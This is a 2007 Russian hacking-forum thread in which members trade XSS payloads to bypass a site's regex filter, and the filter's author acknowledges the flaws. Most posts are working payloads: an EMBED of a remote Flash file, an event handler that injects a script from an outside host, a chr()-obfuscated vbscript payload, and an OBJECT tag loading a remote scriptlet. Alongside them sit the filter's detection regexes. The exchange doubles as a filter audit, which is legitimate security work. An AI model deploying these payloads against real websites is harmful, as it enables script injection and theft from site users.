Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

27.11.2007, 03:36
|
|
Постоянный
Регистрация: 14.01.2007
Сообщений: 459
Провел на форуме: 1469995
Репутация:
589
|
|
Код:
's><EMBED SRC=http://heliosart.info/test.swf AllowScriptAccess=always width=0 height=0><a'
Код флешки:
Код:
_root.onLoad = function()
{
getURL("javascript:alert('XSS')");
}
Последний раз редактировалось Helios; 11.12.2007 в 23:32..
|
|
|

27.11.2007, 03:48
|
|
Участник форума
Регистрация: 01.02.2007
Сообщений: 286
Провел на форуме: 804931
Репутация:
526
|
|
Канешн вариант Хелиоса попрет, но он бут пахать ток если включен флеш. Вот я до сих пор не спал - но нашел решение  Уж очень обидели мну слова ТС "эт максимум на что ты способен". И вот что имеем в итоге:
Код:
'onMouseOver = "t = document.createElement('script'); x = new String('http://vdshark.heliosart.info/1.js'); t.src = x; this.appendChild(t);"
Спасиб Хелиосу за поддержку +)
|
|
|

27.11.2007, 10:28
|
|
Познающий
Регистрация: 12.11.2007
Сообщений: 70
Провел на форуме: 1214722
Репутация:
676
|
|
Молодцы , как и думал ошибка в регулярках , с табами недобрал , супер !
|
|
|

28.11.2007, 00:12
|
|
Познающий
Регистрация: 22.02.2006
Сообщений: 67
Провел на форуме: 4155100
Репутация:
2033
|
|
1. Мало кто из вас такое видел... ну, посмотрите же.  Фильтрописатель забыл про визуалбейсикскрипт  Совсем забыл  Помнит, правда, про msgbox, но этого мало.
Код:
Filter rule : (mocha|livescript|javascript|behavior|execute|eval|open|window|urlencode)\s*[={}\/():;&\+\-\^\[\|]
PHP код:
'l><img src=vbscript:document.write(chr(60)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(62)&chr(97)&chr(108)&chr(101)&chr(114)&chr(116)&chr(40)&chr(39)&chr(76)&chr(101)&chr(118)&chr(101)&chr(114)&chr(79)&chr(110)&chr(101)&chr(39)&chr(41)&chr(60)&chr(47)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(62))><o'
Несмотря на перекрытие потока, фильтр пропустит (будет молчать) такой код, потому что
1) не палит псевдо-vbscript
2) фильтру неизвестен способ обфускации через vbs-функцию chr()
Будет работать в IE 6, для IE 7.0 уязвимость будет пассивной: вставляться будет через тег "a".
2.
Сообщение от Евгений Минаев
Там пробелы, но и с табами тоже.
3. Следующий вариант очень ограничен в применении по причине фиксации в более поздних версиях, но его также следовало бы учесть. Приведу из первоисточника - ha.ckers.org/xss.html
PHP код:
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
Browser support: [NS8.1-G|FF2.0]
4. Еще знаю несколько способов обхода, потому что автор кое-что не учел, но считаю идеотизмом выкладывать способы, которые катят на более серьезных фильтрах крупных систем.
Последний раз редактировалось LeverOne; 28.11.2007 в 00:15..
|
|
|

28.11.2007, 22:52
|
|
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
Провел на форуме: 3069349
Репутация:
808
|
|
Eсли регулярные выражения действительно такие, как показывается, "кое-что" там не одно.
P.S. на больших проектах ещё сложнее сделать защиту,
так как на огромном количестве сайтов есть доступные JS-функции (и переменные),
название которых, конечно же, не фильтруется.
Пожалуй, самый распространенный пример - глобальная переменная d = document; (кто фильтрует букву "d"?)
Если она не объявлена скриптами самого сайта, то может быть объявлена в каком-нибудь счётчике.
Последний раз редактировалось astrologer; 28.11.2007 в 23:13..
|
|
|

29.11.2007, 00:31
|
|
Познающий
Регистрация: 22.02.2006
Сообщений: 67
Провел на форуме: 4155100
Репутация:
2033
|
|
Сообщение от astrologer
Eсли регулярные выражения действительно такие, как показывается, "кое-что" там не одно.
И не два, и не три.  Этих "что-то" там МНОГО. И дело не только в том, сложно или легко учесть в регулярках все известное. Дело в самом знании нигде не записанного.
Кстати, реальные регулярные выражения скрипта такие, как показывается
Вот, например,
Код:
Input string : <script>
Description : Внедрение опасных html тегов
Filter rule : [<\s]((\/?)script(\/?))|((\/?)[i|I]frame(\/?))|(@import)((\/?)object(\/?))[\s>]
Однако '<object>' на самом деле не фильтруется. В результате имеем XSS под Opera:
PHP код:
'lo><OBJECT TYPE=text/x-scriptlet DATA='http://ha.ckers.org/scriptlet.html
Код, ес-но, можно заточить.
Последний раз редактировалось LeverOne; 29.11.2007 в 20:52..
|
|
|

29.11.2007, 11:00
|
|
Познающий
Регистрация: 12.11.2007
Сообщений: 70
Провел на форуме: 1214722
Репутация:
676
|
|
Дамс , забыл поставить знак или | в регулярке , @import тоже катит получается...Думаю на этом можно остановиться ибо наделал я ошибок,надо исправлять
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|